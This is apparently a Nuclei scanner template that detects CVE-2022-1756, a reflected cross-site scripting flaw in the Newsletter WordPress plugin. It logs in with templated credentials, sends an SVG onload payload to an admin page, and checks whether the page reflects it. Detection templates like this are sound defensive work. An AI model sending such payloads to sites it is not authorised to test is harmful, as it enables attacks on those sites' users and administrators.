id: CVE-2022-1756

info:
  name: Newsletter < 7.4.5 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below.
  remediation: Fixed in version 7.4.5
  reference:
    - https://wpscan.com/vulnerability/6ad407fe-db2b-41fb-834b-dd8c4f62b072
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1756
    - https://wordpress.org/plugins/newsletter/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1756
    cwe-id: CWE-79
    epss-score: 0.00117
    epss-percentile: 0.45342
    cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: thenewsletterplugin
    product: newsletter
    framework: wordpress
    publicwww-query: "/wp-content/plugins/newsletter/"
  tags: wpscan,cve,cve2022,newsletter,xss,authenticated,thenewsletterplugin,wordpress

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=newsletter_main_index&debug&"><svg/onload=alert(/document.domain/)> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "newsletter") && contains(body, "><svg/onload=alert(/document.domain/)>")'
        condition: and
# digest: 4b0a00483046022100ec7f5598db681641d327bc75e6d3620029aa182e945713798a8264a3c1d9c857022100e98ae15a093a13d3f24642c46f7aa4906d413c8ce25302633a298af61e1f6e64:922c64590222798bb761d5b6d8e72950